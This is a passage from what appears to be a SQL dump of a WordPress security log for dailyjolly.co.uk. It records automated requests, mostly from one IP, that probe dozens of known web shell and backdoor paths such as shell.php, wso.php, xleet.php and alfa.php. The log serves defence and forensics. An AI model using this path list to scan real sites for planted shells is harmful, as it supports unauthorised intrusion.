,'',0,1674344662.1532,55,'Yc1Ht06Kxjau8O5MVglePn79','','19|0|0|0|www.dailyjolly.co.uk/google.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344662.4863,55,'Ub0vPzjEWQltJomhDqX27wf9','','19|0|0|0|www.dailyjolly.co.uk/haxor.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344662.8339,55,'KxpB6RQym2hlOI3HL4Tvt8eE','','19|0|0|0|www.dailyjolly.co.uk/hehe.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344663.1541,55,'Y0Zoqusrk73PJFfhSOAMR2na','','19|0|0|0|www.dailyjolly.co.uk/image/screenshot_1.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344663.4825,55,'trN0Cbe8Rayl3xBfhLqHKGo9','','19|0|0|0|www.dailyjolly.co.uk/images/vuln.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344663.8127,55,'NEXHnmPwSBvz0r5CtbDxIGRf','','19|0|0|0|www.dailyjolly.co.uk/images/wp-2019.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344664.1558,55,'vaLptkFEl6UNMhs8DxSrzCAw','','19|0|0|0|www.dailyjolly.co.uk/ini.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344664.4787,55,'NHCR0OI3JQxlATMSU1zr4evP','','19|0|0|0|www.dailyjolly.co.uk/lock360.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344664.8187,55,'Ik6pEVDc1aiX54so3ZzLhnPu','','19|0|0|0|www.dailyjolly.co.uk/lufix.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344665.1284,55,'wkIMgnH6RyuBYz58GZvL7oCt','','19|0|0|0|www.dailyjolly.co.uk/mad.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344665.4722,55,'BDECvoTY5OJ9iPFukSbVdRnH','','19|0|0|0|www.dailyjolly.co.uk/marijuana.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344665.7917,55,'d6zhaVylOn4qtHWLxPwQ5s1S','','19|0|0|0|www.dailyjolly.co.uk/mass.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344666.1541,55,'7UY5IM4twjgdZ3qxH2GFPiJu','','19|0|0|0|www.dailyjolly.co.uk/media-admin.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344666.4823,55,'kVctN3jfLB87syCpSEMeFq2n','','19|0|0|0|www.dailyjolly.co.uk/mini.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344676.9154,55,'jdzshnYw3e9NF7q1WoAPRLTf','','19|0|0|0|www.dailyjolly.co.uk/old-index.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344677.2439,55,'nxalTJKoF4m58bCZpEV9IQNe','','19|0|0|0|www.dailyjolly.co.uk/payout.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344677.5920,55,'stv0bEXukWlw8TG2n6qfCjrg','','19|0|0|0|www.dailyjolly.co.uk/pi.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344677.9319,55,'ElcbZ0kvYohOWRuamKP5ni9A','','19|0|0|0|www.dailyjolly.co.uk/priv8.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344678.2507,55,'JrOlL864U1aZ9NB7nETwqH2I','','19|0|0|0|www.dailyjolly.co.uk/R00T.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344678.5704,55,'9t3jy7B4zP0XY5EJMHWpKsnF','','19|0|0|0|www.dailyjolly.co.uk/radio.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344678.9085,55,'tMqBWPfNnVmDGXo1ElkpJus2','','19|0|0|0|www.dailyjolly.co.uk/reminder.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344679.2239,55,'lINBnRPMmj0FuiLvX3pf68sy','','19|0|0|0|www.dailyjolly.co.uk/screenshot_1.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344679.5420,55,'85HX47sPgdznpqtcVkywEThS','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344679.8719,55,'ynKTZfYorqxSmiPJ9aNeLlkw','','19|0|0|0|www.dailyjolly.co.uk/small.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344680.2722,55,'Fys1CaD84NPSZIQEvMgTbm6x','','19|0|0|0|www.dailyjolly.co.uk/srx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344680.5931,55,'AYGjUEWtw19DVfbCTzJeZBL4','','19|0|0|0|www.dailyjolly.co.uk/up-kon.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344680.9099,55,'XtLDg6y8KqI4vUbOQzWo7x2w','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344681.2306,55,'Fj3ECZVaLrkqndNTM1egIQ4Y','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344681.5766,100,'ebfjP6gO3xuoHaSw8kFRpUZr','','13|0|0|0|www.dailyjolly.co.uk/upload.php',0,13,0),('167.172.248.229',2813130981,'',0,1674344681.9236,55,'d1RK6N9pxTXwc8FJM2arqZGP','','19|0|0|0|www.dailyjolly.co.uk/uploads/up.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344682.3651,55,'jgU0zypdsmFIM1fRN2nBq7xo','','19|0|0|0|www.dailyjolly.co.uk/uploads/xleet.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344682.7044,55,'NCPyDF3zkcTZjv8qURLuYWsi','','19|0|0|0|www.dailyjolly.co.uk/ups.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344683.0284,55,'yBESwvDm8iQxhIJg9bsejZfa','','19|0|0|0|www.dailyjolly.co.uk/utchiha.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344683.3401,55,'gApRQ2GwizuLUB0Kc3k8ToHl','','19|0|0|0|www.dailyjolly.co.uk/wikindex.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344683.6622,55,'702gin5uTDwS8oQh4JGW9sVY','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/fx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344684.0248,55,'pv47IPMjq8R5AFS9rX1KUwdt','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/images/module.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344684.5825,55,'Kudq1whFU8C9gn4LaRMjAbVH','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/maint/ms-db.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344684.9471,55,'cHbwSEtD15hBZ30enq9NQoda','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/maint/sidwso.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344685.2779,55,'ZA4s6ByopMqx7agQeHfYnPch','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/priv8.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344685.6361,55,'QGtaKgAT683LBwXJsDWFVpIm','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/rss.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344686.2379,55,'1MsQYXeUmjAzPRp2qNV6TCFd','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/xleet.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344686.5946,55,'XHWvnN1F07JDuIhVplbz2kis','','19|0|0|0|www.dailyjolly.co.uk/wp-blog.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344686.9049,55,'x2cMlUTdrAj8Rwuo6EHsbFW3','','19|0|0|0|www.dailyjolly.co.uk/wp-content/wp-activate.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344687.2300,55,'weGgotEmlbCaYcVWJOisdhPz','','19|0|0|0|www.dailyjolly.co.uk/wp-content/fw.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344687.6327,55,'R2UYtNzsQVeWhoSvwXLyEuik','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/masterx/wpx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344687.9593,55,'E295icUWqhb4DNvS01aoGmnP','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/easybusy/wp-blog.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344688.2837,55,'lKgkEiD21NrQHZmWpxyzRt3G','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/fighter/fk.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344688.6269,55,'xlOAdqiZG9S0Mwzgj2Y1f7sb','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/wp-pridmag/init.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344688.9432,55,'23dHOPC9S6FlY7Rcog8fEv1T','','19|0|0|0|www.dailyjolly.co.uk/wp-content/upgrade/utchiha505.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344689.2951,55,'TGfgR1q3MhXcx50tbSJYrLvN','','19|0|0|0|www.dailyjolly.co.uk/wp-content/upload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344689.6051,55,'qbQjmNKYZer1nliochsfPE69','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/wp-content/uploads/code-execution.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344689.9407,55,'zOWFsL5yJAj9VKPZtGQ4fcq2','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/404.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344690.2616,55,'MPwZ5Cg9FRetlnYdiIyqWb3V','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/4O4.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344690.5874,55,'G7aE9cdPmTeJY0I5Og6D8xXk','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/elementor/about.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344690.9113,55,'fxQWjg8BueHYAPI7bGi9Xl0k','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/external_feed.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344691.2498,55,'SqQlcVgd5Bmsi7Hrwhu0CZxW','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/indoex.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344691.5648,55,'sNqJfCOiucWEKhUG7l63tQom','','19|0|0|0|www.dailyjolly.co.uk/wp-easy.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344691.8788,55,'sqFcfGw3QE52N7yZ61hr0InS','','19|0|0|0|www.dailyjolly.co.uk/wp-god.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344692.2036,55,'NpBM8aZQliJ1nyt96PAD7qWY','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/24.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344692.5202,55,'wECUQ5YcFvWxzf03SKuRN24O','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/indeh.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344692.8348,55,'94a3jAeqWzY1fNmItiVpc0yB','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ms-pie.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344693.1563,55,'D4nTWl3SoM9jby0sLmveu61p','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/radio.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344693.4812,55,'0tYHKwR2BUFEV6xTum8s7AQX','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/theme-templates-private.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344693.8002,55,'ykiHZLM4c9pOSledPm8KQ1zF','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/uplaod.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344694.1175,55,'dKphkznZeYqIUVX0FwCT4ofJ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/v22.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344694.4290,55,'IuwtzyXsfELMUQmao1C7xYFj','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-2019.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344694.7387,55,'u8Q3LYcbXo7nJylDrN0gPSCa','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-includes/admin-bar.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344695.0817,55,'7DhJ2Z3LuXP4sAt1CvzTenOx','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-site.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344695.4061,55,'IaCTq9syM30K18rRbnGQeYEl','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/xmrlpc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344695.7948,55,'i5HSudm1JXYNoyjMPeqa9Zbk','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/xx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344696.1946,100,'0QziGtEJfWreNwICapSTX9UL','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/1index.php',0,13,0),('167.172.248.229',2813130981,'',0,1674344696.6669,55,'MWYolmGu9e58DjysCdgHLNJQ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/assets/pi.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344697.0030,55,'3Tf7v8sqorB0F2iUaCE1PVct','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/block-supports/generated-classname-cron.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344697.3273,55,'ivl6ayQXcFmwCqtW8kgIeNb7','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/ty.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344697.6708,100,'9DGJ4OzhankecXrHw8ZCEjuK','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php',0,13,0),('167.172.248.229',2813130981,'',0,1674344698.0140,55,'1o4yHpWnBaERgfelhKMqAtcx','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/js/a.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344698.4921,55,'vsGaSe3dNjPrMEQbqWp4DCU9','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/alfa.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344698.8141,55,'7cHpzQmWydq13Cnrxo4iI5Ll','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/css_.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344699.1318,55,'iQhoNOSt9V78zbnKD5xcGYXw','','19|0|0|0|www.dailyjolly.co.uk/wp-info.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344699.4396,55,'dZejfc32L7h8ba1omUD5qkT0','','19|0|0|0|www.dailyjolly.co.uk/wp-x.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344699.7691,55,'9nHor3VM7Af45RSjizOLeJhu','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344700.0907,55,'ZAxtw7BNoTf4MaGEHvhViLOu','','19|0|0|0|www.dailyjolly.co.uk/wp_logx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344700.4360,100,'O4MAsSifBD1TCqLZhaFemwgd','','13|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,13,0),('167.172.248.229',2813130981,'',0,1674344700.7579,55,'bpAaoBQ3jTS2nv1iDWYKJNdF','','19|0|0|0|www.dailyjolly.co.uk/wpx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344701.0767,55,'WUI8dyQ65Hz4GVmacYf9xqig','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344701.3872,55,'MxgPCoOGJza6rj2Lb5YTdQ7c','','19|0|0|0|www.dailyjolly.co.uk/wxo.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344701.7161,55,'yPJfveQsrGm8olcbqY9tuV0R','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344702.0786,55,'W7t28AioDzdOgQxYb96jhyXc','','19|0|0|0|www.dailyjolly.co.uk/xl.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344702.4335,55,'2QIZeC7UPAOuTsJg18NFBK3m','','19|0|0|0|www.dailyjolly.co.uk/xleet.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344702.7422,55,'POl6m1LnQWy89G4wzYXhtuNp','','19|0|0|0|www.dailyjolly.co.uk/xlt.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344703.0643,55,'hcTlS0DProMwgCQupZeis4RE','','19|0|0|0|www.dailyjolly.co.uk/xml.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344703.3895,55,'HikhXMJ20OqvEslDNCrV3oB6','','19|0|0|0|www.dailyjolly.co.uk/xmlrqc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344703.7123,55,'WF83LxaZ96BYpSe5QoDqUMCT','','19|0|0|0|www.dailyjolly.co.uk/xwxx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344704.0283,55,'DiFvTEyIBo4hZkXUVKGdc1p2','','19|0|0|0|www.dailyjolly.co.uk/XxX.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344704.3437,55,'cLptnKeARkCXVPdhyl98gF3q','','19|0|0|0|www.dailyjolly.co.uk/xx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344704.6615,55,'qSYWOuUc71y4flo8Chk5gr2x','','19|0|0|0|www.dailyjolly.co.uk/wp-2018.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344704.9807,55,'DtfyzCn7awi9A2JLu3EpPqhx','','19|0|0|0|www.dailyjolly.co.uk/wp-2019.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344705.3288,55,'Cem7URd9XzwatFPilSvBMEH3','','19|0|0|0|www.dailyjolly.co.uk/wp-2020.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344705.6454,55,'xPrpiB5Jc3fGaA4uI8qhosde','','19|0|0|0|www.dailyjolly.co.uk/wp-2021.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344706.0033,55,'ZkM63It71SYcOrlR5ACbos9B','','19|0|0|0|www.dailyjolly.co.uk/wp-2022.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344706.3358,55,'3NuMYsiFcJQnZHr5Rvkj0t4C','','19|0|0|0|www.dailyjolly.co.uk/wp-22.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344706.6968,55,'aNCkZFUi1JOjfgbPvAHluwrx','','19|0|0|0|www.dailyjolly.co.uk/hax.php',0,19,0),('185.192.70.64',3116385856,'',0,1674348310.3556,55,'8Xo3yKG4egzkULHaYVTfJxS7','','19|0|0|0|dailyjolly.co.uk/wp-admin/imagescheckflush.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369862.3992,55,'jAcO5dW7gI1sv6DkZywPGtLi','','19|0|0|0|www.dailyjolly.co.uk/.well-known/chris.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369862.9076,55,'v0eMcCBGdbTOZtW9xiwXV1rn','','19|0|0|0|www.dailyjolly.co.uk/.well-known/da1e2eeec7.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369863.2902,55,'I3MscwtnrF7JxkSdK2GZmaLB','','19|0|0|0|www.dailyjolly.co.uk/.well-known/freshtools.net.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369863.6261,55,'e3Dvh1NfzR5bXOGwLEquMUPg','','19|0|0|0|www.dailyjolly.co.uk/.well-known/gindex.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369863.9623,55,'mQgquO2E90JFz6y3bZSBwNfC','','19|0|0|0|www.dailyjolly.co.uk/.well-known/img.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369863.9714,10,'mQgquO2E90JFz6y3bZSBwNfC','','707|0|0|0|www.dailyjolly.co.uk/.well-known/img.php',0,707,0),('167.172.248.229',2813130981,'',0,1674369864.2920,55,'AXsq9YduL7nhzUIl0pDJVCBj','','19|0|0|0|www.dailyjolly.co.uk/.well-known/seo.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369864.6510,55,'LPEawHk65CtyvSe4uGUj0loD','','19|0|0|0|www.dailyjolly.co.uk/.well-known/subirfoto.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369864.9764,55,'EASgtiPYojTmB6u4rWfaNx5J','','19|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/licsy.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369865.2875,55,'nWqho4KFNiS1RfkTCsru7A6y','','19|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/makeasmtp.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369865.6174,50,'fP37D9eYH86SZ1UEpRsyBIKk','','10|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/wp-signup.php',0,10,0),('167.172.248.229',2813130981,'',0,1674369865.6214,55,'fP37D9eYH86SZ1UEpRsyBIKk','','19|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/wp-signup.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369865.9342,55,'SJlNmubvIP0t5YXeC91M8okF','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/%20.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369866.2757,55,'OfpRwIyKCgFuV3TJDQv8rXSk','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/bala.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369866.5898,55,'v3pbm92cKSyXEOFroiaeUMYu','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/p.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369866.9231,55,'AsfnvwqZ3Qp0OEPHjNGrlMSa','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/psp.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369867.2433,55,'uEyfYX2cUpLiMN7d1nPKO0rB','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/sdf-dffg.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369867.5939,50,'l4kyU1KjRIYfFiwrax7QHANn','','10|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/wp-signup.php',0,10,0),('167.172.248.229',2813130981,'',0,1674369867.6151,55,'l4kyU1KjRIYfFiwrax7QHANn','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/wp-signup.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369867.9693,55,'sZ5XpnWy9ueIbUMErSta86LQ','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/z88x/0z.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369868.2857,55,'sjQCMYb8re1ci7fJFAkLEqaP','','19|0|0|0|www.dailyjolly.co.uk/admin/add_modal.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369868.6593,55,'hG1jNR4QcKnZqDYJUBrsewCT','','19|0|0|0|www.dailyjolly.co.uk/admin/adminedit.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369869.0243,55,'viFrwkEOqth2PY0MaIUxHc8g','','19|0|0|0|www.dailyjolly.co.uk/admin/editProject.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369869.3618,55,'r90fvpBOVxo4eYuDFcHRSzWC','','19|0|0|0|www.dailyjolly.co.uk/admin/index_upload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369869.6845,55,'Xm0pw4U23OdaGtlQzJgSLxFM','','19|0|0|0|www.dailyjolly.co.uk/admin/reg_referencia.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369870.0419,55,'rt4dJch7geFZwp02mlVb6q9X','','19|0|0|0|www.dailyjolly.co.uk/admin/bak/UploadPic.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369870.4193,55,'qkSjJrxXmVUPfLItByaewDOF','','19|0|0|0|www.dailyjolly.co.uk/admin/editor/assetmanager/assetmanager.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369870.7508,55,'iYf7qX0pErsx5c1bUVCZFkJ2','','19|0|0|0|www.dailyjolly.co.uk/assets/css/ENKI.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369871.1048,55,'GpqEuItPeokYOSUDJC9Zxn2w','','19|0|0|0|www.dailyjolly.co.uk/assets/filemanager/dialog.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369871.4942,55,'KnJ50w86mOhMj1VQDorZubd9','','19|0|0|0|www.dailyjolly.co.uk/assets/images/images.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369871.9201,55,'XfV89eZ2xjk0GBQJLrtSUzcl','','19|0|0|0|www.dailyjolly.co.uk/files/auto1.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369872.2678,55,'JAqyYKVMN9DBOfcQXpvsPHx4','','19|0|0|0|www.dailyjolly.co.uk/files/ban.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369872.6288,55,'5QMJiT1Kqzs4lELnOuHPxfkY','','19|0|0|0|www.dailyjolly.co.uk/files/cons.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369872.9381,55,'TMFPe4ukhpow8Ev1YXfHWKxJ','','19|0|0|0|www.dailyjolly.co.uk/files/galeria.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369873.2524,55,'GwYrXV1ReyMlaSOnjQE7oJvt','','19|0|0|0|www.dailyjolly.co.uk/files/upload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369873.6019,55,'pRPoNlXZmdsVLjk4W6Ky3zH2','','19|0|0|0|www.dailyjolly.co.uk/images/1U.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369873.9354,55,'kDVYULuo6cHp4XnCqgfsSayw','','19|0|0|0|www.dailyjolly.co.uk/images/css.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369874.2655,55,'z7Niw0CJ96qKSOcQgaFWLoDX','','19|0|0|0|www.dailyjolly.co.uk/images/domat.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369874.6222,55,'vdq40zGcFSDJog1NxwhaKHbn','','19|0|0|0|www.dailyjolly.co.uk/images/eee.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369874.9525,55,'7ovKJ3au0wfnEY2V94q18gs6','','19|0|0|0|www.dailyjolly.co.uk/images/ET0O.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369875.3459,55,'zMbPktLRWyceUFBHGf8ZQ26N','','19|0|0|0|www.dailyjolly.co.uk/images/formulier.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369875.6539,55,'W5gJL4Z32oiBtQ7VRzw10m8e','','19|0|0|0|www.dailyjolly.co.uk/images/h[1].php',0,19,0),('167.172.248.229',2813130981,'',0,1674369875.9762,55,'NyVljfam63icXoA7Y9Us40Ot','','19|0|0|0|www.dailyjolly.co.uk/images/idpago.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369876.2995,55,'Z6FLxmuKnBU8gAq5NoXRHeWQ','','19|0|0|0|www.dailyjolly.co.uk/images/images.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369876.7201,55,'PBzDnOcXWLYCaukwK1i52fJb','','19|0|0|0|www.dailyjolly.co.uk/images/imagrer.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369877.0293,55,'bm4zGtM9sRPquheBEIZoWOJH','','19|0|0|0|www.dailyjolly.co.uk/images/inbox.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369877.3504,55,'CRZ7nOfpPYGDNdArqh6FEe98','','19|0|0|0|www.dailyjolly.co.uk/images/include.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369877.6730,55,'IU7EzhSbDpsgCt0f5XyVTq1F','','19|0|0|0|www.dailyjolly.co.uk/images/index.blade.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369878.0077,55,'hUNHsDat39SCWOg8l4vAmcyG','','19|0|0|0|www.dailyjolly.co.uk/images/index2.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369878.3190,55,'7Rl6LjvwkbdUWMhmBIQAe5Ht','','19|0|0|0|www.dailyjolly.co.uk/images/iupload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369878.6566,55,'ldMWVw1fcU42izTmuDpyQgq9','','19|0|0|0|www.dailyjolly.co.uk/images/Logo_mm.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369878.9707,55,'simE9BCMxbketYRcvJnA6lXW','','19|0|0|0|www.dailyjolly.co.uk/images/m.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369879.2785,55,'ahEZDLw9bVevGU4N81lzIMOJ','','19|0|0|0|www.dailyjolly.co.uk/images/Marvins.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369879.6181,55,'ujLh2qcvESGkQbpxVMWw8eg6','','19|0|0|0|www.dailyjolly.co.uk/images/membernew.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369879.9502,55,'UuYQKHFGmPTzr6wJd4ntZbq0','','19|0|0|0|www.dailyjolly.co.uk/images/ms-add-pro-photo.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369880.2917,55,'UkWqEwxmJSCaKBcV1NF4AjoD','','19|0|0|0|www.dailyjolly.co.uk/images/newa.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369880.6360,55,'Ifw6Ye7WZJ24n5iugxh8ROCk','','19|0|0|0|www.dailyjolly.co.uk/images/phpimage.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369880.9937,55,'vYw7tonqQMkchspgr81XidxE','','19|0|0|0|www.dailyjolly.co.uk/images/pluginfotos.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369881.3619,55,'ZeFv9guNcDSR1CxKrQw76bzi','','19|0|0|0|www.dailyjolly.co.uk/images/productos_img_edit.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369881.7115,55,'2VEtUlJZHIWLzh0wYKd7g6BS','','19|0|0|0|www.da